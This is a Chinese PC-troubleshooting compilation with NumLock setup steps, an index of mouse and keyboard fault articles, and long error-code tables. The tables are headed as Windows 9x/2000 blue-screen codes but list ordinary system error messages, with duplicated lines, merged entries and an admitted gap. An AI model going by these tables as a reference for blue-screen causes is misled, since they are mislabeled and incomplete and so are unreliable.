    1.单击“开始”菜单中的“运行”命令，然后在“打开”框中键入“sysedit”，按下回车键，打开“系统配置编辑程序”窗口。
    2.单击“Config.sys”标题栏，将它切换为当前编辑窗口，然后在编辑区中键入“NumLock=ON”这一行命令。
    3.保存修改并关闭“系统配置编辑程序”窗口。


鼠标键盘故障

《一键清理系统垃圾》

返回总目录

鼠标键盘故障

◎MODEM和鼠标冲突解决一例
◎Windows XP中使用鼠标右键引起CPU 100%占用问题的解决
◎XP系统CS鼠标加速问题解决办法！！！
◎常见键盘故障分析
◎错接鼠标键盘的故障
◎机械式键盘常见故障处理多例
◎机械鼠标指针游走故障的分析
◎键盘
◎键盘导致多选故障
◎别忘了给电脑“充电”
◎键盘故障两例
◎解决鼠标乱动问题
◎解决鼠标右键被锁定
◎破解网页禁用鼠标右键
◎巧修键盘
◎让键盘不再跳舞
◎如何正确处理系统不认鼠标的故障
◎删除遗留的鼠标右键菜单项
◎鼠标
◎鼠标常见故障分析和解决
◎鼠标常见故障分析与维修
◎鼠标误操作急救
◎水“鼠”不容
◎为你的“病鼠”把脉
◎修复不听话的鼠标
◎虚拟光驱抢占中断引起的鼠标故障
◎拯救断了线的鼠标
◎关闭小键盘上的NumLock

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


WIN9X蓝屏错误代码

《一键清理系统垃圾》

返回总目录 目录页 下一页

WIN9X蓝屏错误代码

WIN98下出现蓝屏是经常事，而这个时候我们做的多是重新启动以恢复操作，但蓝屏的原因是什么？我的机器到底出了什么问题，这时就知其然不知所以然。这个表也许能帮的上你。使用时用WIN快捷键 ctrl+f 进行查找。

数 值 叙 述
0 0x0000 操作完成。
1 0x0001 不正确的函数。
2 0x0002 系统找不到指定的文件。
3 0x0003 系级找不到指定的路径。
4 0x0004 系统无法打开文件。
5 0x0005 拒绝存取。
6 0x0006 无效的代码。
7 0x0007 内存控制模块已损坏。
8 0x0008 内存空间不足，无法处理这个指令。
9 0x0009 内存控制模块地址无效。
10 0x000A 环境不正确。
11 0x000B 尝试载入一个格式错误的程序。
12 0x000C 存取码错误。
13 0x000D 资料错误。
14 0x000E 内存空间不够，无法完成这项操作。
15 0x000F 系统找不到指定的硬盘。
16 0x0010 无法移除目录。
17 0x0011 系统无法将文件移到其它的硬盘。
18 0x0012 没有任何文件。
19 0x0013 储存媒体为防写状态。
20 0x0014 系统找不到指定的装置。
21 0x0015 装置尚未就绪。
22 0x0016 装置无法识别指令。
23 0x0017 资料错误(cyclic redundancy check)
24 0x0018 程序发出一个长度错误的指令。
25 0x0019 磁盘机在磁盘找不到持定的磁区或磁轨。
26 0x001A 指定的磁盘或磁盘无法存取。
27 0x001B 磁盘机找不到要求的磁区。
28 0x001C 打印机没有纸。
29 0x001D 系统无法将资料写入指定的磁盘。
30 0x001E 系统无法读取指定的装置。
31 0x001F 连接到系统的某个装置没有作用。
32 0x0020 The process cannot access the file because it is being used byanother process.
33 0x0021 文件的一部份被锁定，现在无法存取。
34 0x0022 磁盘机的磁盘不正确。请将%2(Volume Serial Number: %3)插入磁盘机%1。
36 0x0024 开启的分享文件数量太多。
38 0x0026 到达文件结尾。
39 0x0027 磁盘已满。
50 0x0032 不支持这种网络要求。
51 0x0033 远端电脑无法使用。
52 0x0034 网络名称重复。
53 0x0035 网络路径找不到。
54 0x0036 网络繁忙。
55 0x0037 The specified network resource or device is no longer available.
56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网卡发生问题。
58 0x003A 指定的服务器无法执行要求的操作。
59 0x003B 网络发生意外的错误。
60 0x003C 远端配接卡不兼容。
61 0x003D 打印机队列已满。
62 0x003E 服务器的空间无法储存等候打印的文件。
63 0x003F 等候打印的文件已经删除。
64 0x0040 指定的网络名称无法使用。
65 0x0041 拒绝存取网络。
66 0x0042 网络资源类型错误。
67 0x0043 网络名称找不到。
68 0x0044 超过区域电脑网卡的名称限制。
69 0x0045 超过网络BIOS操作阶段的限制。
70 0x0046 远端服务器已经暂停或者正在起始中。
71 0x0047 由于连接数目已达上限，此时无法再连接到这台远端电脑。
72 0x0048 指定的打印机或磁盘装置已经暂停作用。
80 0x0050 文件已经存在。
82 0x0052 无法建立目录或文件。
83 0x0053 INT24失败
84 0x0054 处理这项要求的储存体无法使用。
85 0x0055 近端装置名称已经在使用中。
86 0x0056 指定的网络密码错误。
87 0x0057 参数错误。
88 0x0058 网络发生资料写入错误。
89 0x0059 此时时系统无法执行其它行程。
100 0x0064 无法建立其它的系统semaphore。
101 0x0065 属于其它行程专用的semaphore。
102 0x0066 semaphore已经设定，而且无法关闭。
103 0x0067 无法指定semaphore 。
104 0x0068 在岔断时间无法要求专用的semaphore。
105 0x0069 此 semaphore 先前的拥有权已经结束。
106 0x006A 请将磁盘插入 %1。
107 0x006B 因为代用的磁盘尚未插入，所以程序已经停止。
108 0x006C 磁盘正在使用中或被锁定。
109 0x006D Pipe 已经中止。
110 0x006E 系统无法开启指定的装置或档案。
111 0x006F 文件名太长。
112 0x0070 硬盘空间不足。
113 0x0071 没有可用的内部文件识别字。
114 0x0072 目标内部文件识别字不正确。
117 0x0075 由应用程序所执行的IOCTL呼叫不正确。
118 0x0076 写入验证参数值不正确。
119 0x0077 系统不支持所要求的指令。
120 0x0078 此项功能仅在 Win32 模式有效。
121 0x0079 semaphore 超过逾时期间。
122 0x007A 传到系统呼叫的资料区域太小。
123 0x007B 文件名、目录名和或储存体标签语法错误。
124 0x007C 系统呼叫层次不正确。
125 0x007D 磁盘没有设定标签。
126 0x007E 找不到指定的模组。
127 0x007F 找不到指定的程序。
128 0x0080 没有子行程可供等待。
129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。
130 0x0082 Attempt to use a file handle to an open disk partition for anoperation other than raw disk I/O.
131 0x0083 尝试将文件指标移至文件开头之前。
132 0x0084 无法在指定的装置或文件，设定文件指标。
133 0x0085 JOIN 或 SUBST 指令 无法用于内含事先结合过的磁盘机。
134 0x0086 尝试在已经结合的磁盘机，使用 JOIN 或 SUBST 指令。
135 0x0087 尝试在已经替换的磁盘机，使 用 JOIN 或 SUBST 指令。
136 0x0088 系统尝试删除未连结过的磁盘机的连结关系。
137 0x0089 系统尝试删除未替换过的磁盘机的替换关系。
138 0x008A 系统尝试将磁盘机结合到已经结合过之磁盘机的目录。
139 0x008B 系统尝试将磁盘机替换成已经替换过之磁盘机的目录。
140 0x008C 系统尝试将磁盘机替换成已经替换过之磁盘机的目录。
141 0x008D 系统尝试将磁盘机 SUBST 成已结合的磁盘机目录。
142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
143 0x008F 系统无法将磁盘机结合或替换同一磁盘机下目录。
144 0x0090 这个目录不是根目录的子目录。
145 0x0091 目录仍有资料。
146 0x0092 指定的路径已经被替换过。
147 0x0093 资源不足，无法处理这项指令。
148 0x0094 指定的路径这时候无法使用。
149 0x0095 尝试要结合或替换的磁盘机目录，是已经替换过的目标。
150 0x0096 CONFIG.SYS 文件未指定系统追踪资讯，或是追踪功能被取消。
151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
152 0x0098 DosMuxSemWait 没有执行/设定太多的 semaphore。
153 0x0099 DosMuxSemWait 清单不正确。
154 0x009A 你所输入的储存媒体标元长度限制。
155 0x009B 无法建立其它的执行绪。
156 0x009C 接收行程拒绝接受信号。
157 0x009D 区段已经被舍弃，无法被锁定。
158 0x009E 区段已经解除锁定。
159 0x009F 执行绪识别码的地址不正确。
160 0x00A0 传到 DosExecPgm 的引数字符串不正确。
161 0x00A1 指定的路径不正确。
162 0x00A2 信号等候处理。
164 0x00A4 系统无法建立执行绪。
167 0x00A7 无法锁定文件的部份范围。
170 0x00AA 所要求的资源正在使用中。
173 0x00AD 取消范围的锁定要求不明显。
174 0x00AE 文件系统不支持自动变更锁定类型。
180 0x00B4 系统发现不正确的区段号码。
182 0x00B6 操作系统无法执行 %1。
183 0x00B7 文件已经存在，无法建立同一文件。
186 0x00BA 传送的旗号错误。
187 0x00BB 指定的系统旗号找不到。
188 0x00BC 操作系统无法执行 %1。
189 0x00BD 操作系统无法执行 %1。
190 0x00BE 操作系统无法执行 %1。
191 0x00BF 无法在 Win32 模式下执行 %1。
192 0x00C0 操作系统无法执行 %1。
193 0x00C1 %1 不是正确的 Win32 应用程序。
194 0x00C2 操作系统无法执行 %1。
195 0x00C3 操作系统无法执行 %1。
196 0x00C4 操作系统无法执行这个应用程序。
197 0x00C5 操作系统目前无法执行这个应用程序。
198 0x00C6 操作系统无法执行 %1。
199 0x00C7 操作系统无法执行这个应用程序。
200 0x00C8 程序码的区段不可以大于或等于64KB。
201 0x00C9 操作系统无法执行 %1。
202 0x00CA 操作系统无法执行 %1。
203 0x00CB 系统找不到输入的环境选项。
205 0x00CD 在指令子目录下，没有任何行程有信号副处理程序。
206 0x00CE 文件名称或副文件名太长。
207 0x00CF ring 2 堆迭使用中。
208 0x00D0 输入的通用文件名字元 * 或 ? 不正确，或指定太多的通用文件名字元。
209 0x00D1 所传送的信号不正确。
210 0x00D2 无法设定信号处理程序。
212 0x00D4 区段被锁定，而且无法重新配置。
214 0x00D6 附加到此程序或动态连结模组的动态连结模组太多。
215 0x00D7 Can''t nest calls to LoadModule.
230 0x00E6 The pipe state is invalid.
231 0x00E7 所有的 pipe instances 都在忙碌中。
232 0x00E8 The pipe is being closed.
233 0x00E9 No process is on the other end of the pipe.
234 0x00EA 有更多可用的资料。
240 0x00F0 操作阶段被取消。
254 0x00FE 指定的延伸属性名称无效。
255 0x00FF 延伸的属性不一致。
259 0x0103 没有可用的资料。
266 0x010A 无法使用 Copy API。
267 0x010B 目录名称错误。
275 0x0113 延伸属性不适用于缓冲区。
276 0x0114 在外挂的文件系统上的延伸属性文件已经损坏。
277 0x0115 延伸属性表格档满。
278 0x0116 指定的延伸属性代码无效。
282 0x011A 外挂的这个文件系统不支持延伸属性。
288 0x0120 意图释放不属于叫用者的 mutex。
298 0x012A semaphore 传送次数过多。
299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。
317 0x013D 系统找不到位于讯息文件%2中编号为0x%1的讯息。
487 0x01E7 尝试存取无效的地址。
534 0x0216 运算结果超过32位。
535 0x0217 信道的另一端有一个行程在接送资料。
536 0x0218 等候行程来开启信道的另一端。
994 0x03E2 存取延伸的属性被拒。
995 0x03E3 由于执行绪结束或应用程序要求，而异常终止 I/O操作。
996 0x03E4 重迭的 I/O 事件不是设定成通知状态。
997 0x03E5 正在处理重迭的 I/O 操作。
998 0x03E6 对记忆体位置的无效存取。
999 0x03E7 执行 inpage 操作发生错误。
1001 0x03E9 递归太深，堆迭溢出。(递归是什幺东西???????)
1002 0x03EA 视窗无法用来传送讯息。
1003 0x03EB 无法完成这项功能。
1004 0x03EC 旗号无效。
1005 0x03ED 储存媒体未含任何可辨识的文件系统。请确以载入所需的系统驱动
程序，而且该储存媒体并未损坏。
1006 0x03EE 储存该文件的外部媒体发出警告，表示该已开启文件已经无效。
1007 0x03EF 所要求的作业无法在全屏幕模式下执行。
1008 0x03F0 An attempt was made to reference a token that does not exist.
1009 0x03F1 组态系统登录数据库毁损。
1010 0x03F2 组态系统登录机码无效。
1011 0x03F3 无法开启组态系统登录机码。
1012 0x03F4 无法读取组态系统登录机码。
1013 0x03F5 无法写入组态系统登录机码。
1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。 已经还原成功。
1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存 内容毁损、会是档案无法复原。
1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新，其中的一个档案 内含系统登录在内存中的内容。
1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中， 但是，指定档案的格式不是系统登录文件的格式。
1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
1019 0x03FB 系统无法配置系统登录记录所需的空间。
1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
1021 0x03FD 无法在临时机码下建立永久的子机码。
1022 0x03FE 变更要求的通知完成，但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案，找出变更的地方。
1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
1052 0x041C 要求的控制对此服务无效
1053 0x041D The service did not respond to the start or control request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。
1055 0x041F 服务数据库被锁定。
1056 0x0420 这种服务已经在执行。
1057 0x0421 帐户名称错误或者不存在。
1058 0x0422 指定的服务暂停作用，无法激活。
1059 0x0423 指定循环服务从属关系。
1060 0x0424 指定的服务不是安装进来的服务。
1061 0x0425 该服务项目此时无法接收控制讯息。
1062 0x0426 服务尚未激活。
1063 0x0427 无法联机到服务控制程序。
1064 0x0428 处理控制要求时，发生意外状况。
1065 0x0429 指定的数据库不存在。
1066 0x042A 服务传回专属于服务的错误码。
1067 0x042B The process terminated unexpectedly.
1068 0x042C 从属服务或群组无法激活。
1069 0x042D 因为登入失败，所以没有激活服务。
1070 0x042E 在激活之后，服务在激活状态时当机。
1071 0x042F 指定服务数据库锁定无效。
1072 0x0430 指定的服务已经标示为删除。
1073 0x0431 指定的服务已经存在。
1074 0x0432 系统目前正以上一次执行成功的组态执行。
1075 0x0433 从属服务不存在，或已经标示为删除。
1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。
1077 0x0435 上一次激活之后，就没有再激活服务。
1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。
1100 0x044C 已经到了磁带的最后。
1101 0x044D 到了档案标示。
1102 0x044E 遇到磁带的开头或分割区。
1103 0x044F 到了档案组的结尾。
1104 0x0450 磁带没有任何资料。
1105 0x0451 磁带无法制作分割区。
1106 0x0452 存取多重容体的新磁带时，发现目前区块大小错误。
1107 0x0453 加载磁带时，找不到磁带分割区信息。
1108 0x0454 无法锁住储存媒体退带功能。
1109 0x0455 无法解除加载储存媒体。
1110 0x0456 磁盘驱动器中的储存媒体已经变更。
1111 0x0457 已经重设 I/O 总线。
1112 0x0458 磁盘驱动器没有任何储存媒体。
1113 0x0459 目标 multi-byte code page，没有对应 Unicode 字符。
1114 0x045A 动态链接库 (DLL) 起始例程失败。
1115 0x045B 系统正在关机。
1116 0x045C 无法中止系统关机，因为没有关机的动作在进行中。
1117 0x045D 因为 I/O 装置发生错误，所以无法执行要求。
1118 0x045E 序列装置起始失败，会取消加载序列驱动程序。
1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求(IRQ)。至少已经有一个使用同一IRQ 的其它装置已经开启。
1120 0x0460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
1121 0x0461 因为已经过了逾时时间，所以序列 I/O 作业完成。(IOCTL_SERIAL_XOFF_COUNTER 不是零。)
1122 0x0462 在磁盘找不到任何的 ID 地址标示。
1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。
1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。
1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。
1126 0x0466 存取硬盘失败，重试后也无法作业。
1127 0x0467 存取硬盘失败，重试后也无法作业。
1128 0x0468 存取硬盘时，必须重设磁盘控制卡，但是连重设的动作也失败。
1129 0x0469 到了磁带的最后。
1130 0x046A 可用服务器储存空间不足，无法处理这项指令。
1131 0x046B 发现潜在的死锁条件。
1132 0x046C 指定的基本地址或档案位移没有适当对齐。
1140 0x0474 尝试变更系统电源状态，但其它的应用程序或驱动程序拒绝。
1141 0x0475 系统 BIOS 无法变更系统电源状态。
1150 0x047E 指定的程序需要新的 Windows 版本。
1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。
1152 0x0480 指定的程序已经激活，无法再激活一次。
1153 0x0481 指定的程序是为旧版的 Windows 所写的。
1154 0x0482 执行此应用程序所需的链接库档案之一毁损。
1155 0x0483 没有应用程序与此项作业的指定档案建立关联。
1156 0x0484 传送指令到应用程序发生错误。
1157 0x0485 找不到执行此应用程序所需的链接库档案。
1200 0x04B0 指定的装置名称无效。
1201 0x04B1 装置现在虽然未联机，但是它是一个记忆联机。
1202 0x04B2 尝试记忆已经记住的装置。
1203 0x04B3 提供的网络路径找不到任何网络提供程序。
1204 0x04B4 指定的网络提供程序名称错误。
1205 0x04B5 无法开启网络联机设定文件。
1206 0x04B6 网络联机设定文件坏掉。
1207 0x04B7 无法列举非容器。
1208 0x04B8 发生延伸的错误。
1209 0x04B9 指定的群组名称错误。
1210 0x04BA 指定的计算机名称错误。
1211 0x04BB 指定的事件名称错误。
1212 0x04BC 指定的网络名称错误。
1213 0x04BD 指定的服务名称错误。
1214 0x04BE 指定的网络名称错误。
1215 0x04BF 指定的资源共享名称错误。
1216 0x04C0 指定的密码错误。
1217 0x04C1 指定的讯息名称错误。
1218 0x04C2 指定的讯息目的地错误。
1219 0x04C3 所提供的条件与现有的条件组发生冲突。
1220 0x04C4 尝试与网络服务器联机，但是与该服务器的联机已经太多。
1221 0x04C5 其它网络计算机已经在使用这个工作群组或网域名称。
1222 0x04C6 网络没有显示出来或者没有激活。
1223 0x04C7 使用者已经取消作业。
1224 0x04C8 要求的作业无法在已经开启使用者对应区段的档案执行。
1225 0x04C9 远程系统拒绝网络联机。
1226 0x04CA 关闭网络联机。
1227 0x04CB 网络传输端点已经有相关连的地址。
1228 0x04CC 地址尚未有相关的网络端点。
1229 0x04CD 尝试在不存在的网络连线作业。
1230 0x04CE 在作用中的网络联机上执行无效的作业。
1231 0x04CF 无法传输到远程网络。
1232 0x04D0 无法联机到远程系统。
1233 0x04D1 远程系统不支持传输通讯协议。
1234 0x04D2 远程系统的目的地网络端点没有作何执行中的服务。
1235 0x04D3 要求已经中止。
1236 0x04D4 进端系统已经中断网络联机。
1237 0x04D5 无法完成作业，请重试。
1238 0x04D6 无法与服务器联机，原因是这个帐户已经到达同时联机数目的上限。
1239 0x04D7 尝试在这个帐户未授权的时间登入网络。
1240 0x04D8 这个帐户无法从这个地方登入网络。
1241 0x04D9 网络地址无法用于这个要求的作业。
1242 0x04DA 服务已经登记。
1243 0x04DB 指定的服务不存在。
1244 0x04DC 作业无法执行，原因是使用者尚未授权使用。
1245 0x04DD 要求的作业无法执行，原因是使用者尚未登入网络。指定的服务不存在。
1246 0x04DE 传回要求呼叫者继续工作的讯息。
1247 0x04DF 在完成起始作业之后，尝试再执行起始作业。
1248 0x04E0 没有其它的近端装置。


Win2000蓝屏画面错误代码说明(1)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(1)

在很多电脑用户来说，Windows蓝屏是一个很严重的问题。它可能是系统崩溃的前兆，也可以是系统已经崩溃的现象。但很多时候，这样的蓝屏问题并非没有解决的方法，但前提是我们了解蓝屏时，系统提示的信息，下面我们为大家一一列出Windows 2000的蓝屏提示信息解析。

0 0x0000 作业完成。
1 0x0001 不正确的函数。
2 0x0002 系统找不到指定的档案。
3 0x0003 系统找不到指定的路径。
4 0x0004 系统无法开启档案。
5 0x0005 拒绝存取。
6 0x0006 无效的代码。
7 0x0007 储存体控制区块已毁。
8 0x0008 储存体空间不足，无法处理这个指令。
9 0x0009 储存体控制区块地址无效。
10 0x000A 环境不正确。
11 0x000B 尝试加载一个格式错误的程序。
12 0x000C 存取码错误。
13 0x000D 资料错误。
14 0x000E 储存体空间不够，无法完成这项作业。
15 0x000F 系统找不到指定的磁盘驱动器。
16 0x0010 无法移除目录。
16 0x0010 无法移除目录。
17 0x0011 系统无法将档案移到 其它的磁盘驱动器。
18 0x0012 没有任何档案。
19 0x0013 储存媒体为写保护状态。
20 0x0014 系统找不到指定的装置。
21 0x0015 装置尚未就绪。
22 0x0016 装置无法识别指令。
23 0x0017 资料错误 (cyclic redundancy check)
24 0x0018 程序发出一个长度错误的指令。
25 0x0019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。
26 0x001A 指定的磁盘或磁盘无法存取。
27 0x001B 磁盘驱动器找不到要求的扇区。
28 0x001C 打印机没有纸。
29 0x001D 系统无法将资料写入指定的磁盘驱动器。
30 0x001E 系统无法读取指定的装置。
31 0x001F 连接到系统的某个装置没有作用。
32 0x0020 The process cannot access the file because it is being used by another process.
33 0x0021 档案的一部份被锁定， 现在无法存取。
34 0x0022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial Number: %3) 插入磁盘机%1。
36 0x0024 开启的分享档案数量太多。
38 0x0026 到达档案结尾。
39 0x0027 磁盘已满。
50 0x0032 不支持这种网络要求。
51 0x0033 远程计算机无法使用。
52 0x0034 网络名称重复。
53 0x0035 网络路径找不到。
54 0x0036 网络忙碌中。
55 0x0037 The specified network resource or device is no longer available.
56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网络配接卡发生问题。
58 0x003A 指定的服务器无法执行要求的作业。
59 0x003B 网络发生意外错误。
60 0x003C 远程配接卡不兼容。
61 0x003D 打印机队列已满。
62 0x003E 服务器的空间无法储存等候打印的档案。
63 0x003F 等候打印的档案已经删除。
64 0x0040 指定的网络名称无法使用。
65 0x0041 拒绝存取网络。
65 0x0041 拒绝存取网络。
66 0x0042 网络资源类型错误。
67 0x0043 网络名称找不到。
68 0x0044 超过区域计算机网络配接卡的名称限制。
69 0x0045 超过网络 BIOS 作业阶段的限制。
70 0x0046 远程服务器已经暂停或者正在起始中。
71 0x0047 由于联机数目已达上限，此时无法再联机到这台远程计算机。
72 0x0048 指定的打印机或磁盘装置已经暂停作用。
80 0x0050 档案已经存在。
82 0x0052 无法建立目录或档案。
83 0x0053 INT 24　失败
84 0x0054 处理这项要求的储存体无法使用。
85 0x0055 近端装置名称已经在使用中。
86 0x0056 指定的网络密码错误。
87 0x0057 参数错误。
88 0x0058 网络发生资料写入错误。
89 0x0059 此时系统无法执行其它行程。
100 0x0064 无法建立其它的系统 semaphore。
注：由于资料丢失，暂时没法找到90—99的信息提示


Win2000蓝屏画面错误代码说明(2)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(2)

101 0x0065 属于其它行程专用的 semaphore.
102 0x0066 semaphore 已经设定，而且无法关闭。
103 0x0067 无法指定 semaphore 。
104 0x0068 在岔断时间无法要求专用的 semaphore 。
104 0x0068 在岔断时间无法要求专用的 semaphore 。
105 0x0069 此 semaphore 先前的拥有权已经结束。
106 0x006A 请将磁盘插入 %1。
107 0x006B 因为代用的磁盘尚未插入，所以程序已经停止。
108 0x006C 磁盘正在使用中或被锁定。
109 0x006D Pipe 已经中止。
110 0x006E 系统无法开启指定的 装置或档案。
111 0x006F 档名太长。
112 0x0070 磁盘空间不足。
113 0x0071 没有可用的内部档案标识符。
114 0x0072 目标内部档案标识符不正确。
117 0x0075 由应用程序所执行的 IOCTL 呼叫 不正确。
118 0x0076 写入验证参数值不正确。
119 0x0077 系统不支持所要求的指令。
120 0x0078 此项功能仅在 Win32 模式有效。
121 0x0079 semaphore 超过逾时期间。
122 0x007A 传到系统呼叫的资料区域 太小。
123 0x007B 文件名、目录名称或储存体卷标语法错误。
124 0x007C 系统呼叫层次不正确。
125 0x007D 磁盘没有设定卷标。
126 0x007E 找不到指定的模块。
127 0x007F 找不到指定的程序。
128 0x0080 没有子行程可供等待。
128 0x0080 没有子行程可供等待。
129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。
130 0x0082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O.
131 0x0083 尝试将档案指针移至档案开头之前。
132 0x0084 无法在指定的装置或档案，设定档案指针。
133 0x0085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。
134 0x0086 尝试在已经结合的磁盘驱动器，使用 JOIN 或 SUBST 指令。
135 0x0087 尝试在已经替换的磁盘驱动器，使 用 JOIN 或 SUBST 指令。
136 0x0088 系统尝试删除 未连结过的磁盘驱动器的连结关系。
137 0x0089 系统尝试删除 未替换过的磁盘驱动器的替换关系。
138 0x008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。
139 0x008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
140 0x008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
141 0x008D 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。
142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
143 0x008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。
144 0x0090 这个目录不是根目录的子目录。
145 0x0091 目录仍有资料。
146 0x0092 指定的路径已经被替换过。
147 0x0093 资源不足，无法处理这项 指令。
148 0x0094 指定的路径这时候无法使用。
148 0x0094 指定的路径这时候无法使用。
149 0x0095 尝试要结合或替换的磁盘驱动器目录，是已经替换过的的目标。
150 0x0096 CONFIG.SYS 文件未指定系统追踪信息，或是追踪功能被取消。
151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
152 0x0098 DosMuxSemWait 没有执行；设定太多的 semaphore。
153 0x0099 DosMuxSemWait 清单不正确。
154 0x009A 您所输入的储存媒体标 元长度限制。
155 0x009B 无法建立其它的执行绪。
156 0x009C 接收行程拒绝接受信号。
157 0x009D 区段已经被舍弃，无法被锁定。
158 0x009E 区段已经解除锁定。
159 0x009F 执行绪识别码的地址不正确。
160 0x00A0 传到 DosExecPgm 的自变量字符串不正确。
161 0x00A1 指定的路径不正确。
162 0x00A2 信号等候处理。
164 0x00A4 系统无法建立执行绪。
167 0x00A7 无法锁定档案的部份范围。
170 0x00AA 所要求的资源正在使用中。
173 0x00AD 取消范围的锁定要求不明显。
174 0x00AE 档案系统不支持自动变更锁定类型。
180 0x00B4 系统发现不正确的区段号码。
182 0x00B6 操作系统无法执行 %1。
182 0x00B6 操作系统无法执行 %1。
183 0x00B7 档案已存在，无法建立同一档案。
186 0x00BA 传送的旗号错误。
187 0x00BB 指定的系统旗号找不到。
188 0x00BC 操作系统无法执行 %1。
189 0x00BD 操作系统无法执行 %1。
190 0x00BE 操作系统无法执行 %1。
191 0x00BF 无法在 Win32 模式下执行 %1。
192 0x00C0 操作系统无法执行 %1。
193 0x00C1 %1 不是正确的 Win32 应用程序。
194 0x00C2 操作系统无法执行 %1。
195 0x00C3 操作系统无法执行 %1。
196 0x00C4 操作系统无法执行 这个应用程序。
197 0x00C5 操作系统目前无法执行 这个应用程序。
198 0x00C6 操作系统无法执行 %1。
199 0x00C7 操作系统无法执行 这个应用程序。


Win2000蓝屏画面错误代码说明(3)

《一键清理系统垃圾》

Win2000蓝屏画面错误代码说明(3)

200 0x00C8 程序代码的区段不可以大于或等于 64KB。
201 0x00C9 操作系统无法执行 %1。
202 0x00CA 操作系统无法执行 %1。
203 0x00CB 系统找不到输入的环境选项。\r
205 0x00CD 在指令子目录下，没有任何行程有信号副处理程序。
206 0x00CE 文件名称或扩展名太长。
207 0x00CF ring 2 堆栈使用中。
207 0x00CF ring 2 堆栈使用中。
208 0x00D0 输入的通用档名字元 * 或 ? 不正确， 或指定太多的通用檔名字元。
209 0x00D1 所传送的信号不正确。
210 0x00D2 无法设定信号处理程序。
212 0x00D4 区段被锁定，而且无法重新配置。
214 0x00D6 附加到此程序或动态连结模块的动态连结模块太多。
215 0x00D7 Can't nest calls to LoadModule.
230 0x00E6 The pipe state is invalid.
231 0x00E7 所有的 pipe instances 都在忙碌中。
232 0x00E8 The pipe is being closed.
233 0x00E9 No process is on the other end of the pipe.
234 0x00EA 有更多可用的资料。
240 0x00F0 作业阶段被取消。
254 0x00FE 指定的延伸属性名称无效。
255 0x00FF 延伸的属性不一致。
259 0x0103 没有可用的资料。
266 0x010A 无法使用 Copy API。
267 0x010B 目录名称错误。
275 0x0113 延伸属性不适用于缓冲区。
276 0x0114 在外挂的档案系统上的延伸属性档案已经毁损。
277 0x0115 延伸属性表格文件满。
278 0x0116 指定的延伸属性代码无效。
278 0x0116 指定的延伸属性代码无效。
282 0x011A 外挂的这个档案系统不支持延伸属性。
288 0x0120 意图释放不属于叫用者的 mutex。
298 0x012A semaphore 传送次数过多。
299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。
317 0x013D 系统找不到位于讯息文件 %2 中编号为 0x%1 的讯息。
487 0x01E7 尝试存取无效的地址。
534 0x0216 运算结果超过 32 位。
535 0x0217 信道的另一端有一个行程在接送资料。
536 0x0218 等候行程来开启信道的另一端。
994 0x03E2 存取延伸的属性被拒。
995 0x03E3 由于执行绪结束或应用程序要求，而异常终止 I/O 作业。
996 0x03E4 重叠的 I/O 事件不是设定成通知状态。
997 0x03E5 正在处理重叠的 I/O 作业。
998 0x03E6 对内存位置的无效存取。
999 0x03E7 执行 inpage 作业发生错误。
1001 0x03E9 递归太深，堆栈满溢。
1002 0x03EA 窗口无法用来传送讯息。
1003 0x03EB 无法完成这项功能。
1004 0x03EC 旗号无效。
1005 0x03ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需的系统驱动程序，而且该储存媒体并未毁损。
1006 0x03EE 储存该档案的外部媒体发出警告，表示该已开启档案已经无效。
1007 0x03EF 所要求的作业无法在全屏幕模式下执行。
1008 0x03F0 An attempt was made to reference a token that does not exist.
1009 0x03F1 组态系统登录数据库毁损。
1010 0x03F2 组态系统登录机码无效。
1011 0x03F3 无法开启组态系统登录机码。
1012 0x03F4 无法读取组态系统登录机码。
1013 0x03F5 无法写入组态系统登录机码。
1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。已经还原成功。
1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存内容毁损、会是档案无法复原。
1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新，其中的一个档案 内含系统登录在内存中的内容。
1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中， 但是，指定档案的格式不是系统登录文件的格式。
